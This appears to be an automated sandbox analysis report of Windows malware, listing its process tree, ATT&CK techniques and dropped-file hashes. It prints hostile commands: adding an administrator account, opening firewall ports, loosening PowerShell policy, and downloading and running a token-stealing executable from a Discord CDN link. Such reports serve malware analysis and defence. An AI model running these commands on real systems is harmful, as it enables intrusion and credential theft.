- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:968
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:2448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2964
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2272
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3004
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1488
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:108
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2924
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1800
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2712
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3004
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1108
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2776
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:992
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2696
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2436
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2296
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2064
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2792
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2296
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1544
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1244
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2376
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:3020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:1620
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2360
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2480
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2976
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2372
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2604
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2372
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:976
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2480
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2708
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2800
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2188
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1848
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1808
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3048
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2064
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2140
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:1072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:1488
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2552
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2636
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1356
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2592
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2232
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1384
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1932
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2692
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2612
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1928
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2712
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2616
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2536
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2864
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2548
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1600
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2836
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:3064
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2716
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2772
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1760
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:1788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:428
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:2628
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2684
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:3016
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2420
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2984
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:3056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2288
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2524
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2552
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:3016
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2328
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2604
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1984
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1848
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:3068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2356
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2096
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:1280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2596
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2192
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2356
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2656
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2240
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2444
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2652
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:1600
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
    3⤵
    PID:2740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
    3⤵
    PID:2736
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
  2⤵
  PID:1872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"
  2⤵
  PID:2208
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
  2⤵
  PID:2192
- C:\Users\Admin\GetToken.exe
  GetToken.exe
  2⤵
  PID:1264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"
  2⤵
  PID:1384
- C:\Windows\system32\ipconfig.exe
  ipconfig
  2⤵
  - Gathers network information
  PID:2692
- C:\Windows\system32\getmac.exe
  getmac
  2⤵
  PID:2856
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status
  2⤵
  PID:2352
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get totalphysicalmemory
  2⤵
  PID:692
- C:\Windows\System32\Wbem\WMIC.exe
  wmic partition get name,size,type
  2⤵
  PID:2184
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
1⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
1⤵
PID:2588

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:2724

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs

Filesize
130B

MD5
591cc6cb1292cf00d1f24e0832e82c7f

SHA1
27b190559fd22ee46085db02ce8725a4c6720e64

SHA256
6cff6ccccc854997bb89a46157554a0265afc1f3d3f5d0522f6a1323cc559862

SHA512
0b89a67ca2c3ca0563231b805b6db921a3515f20c86dfb4cd28b195ea0de6f05f46e1fccc9041b8f96013e15d139e104454d064fd4529fb44151ee024f8d18b7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
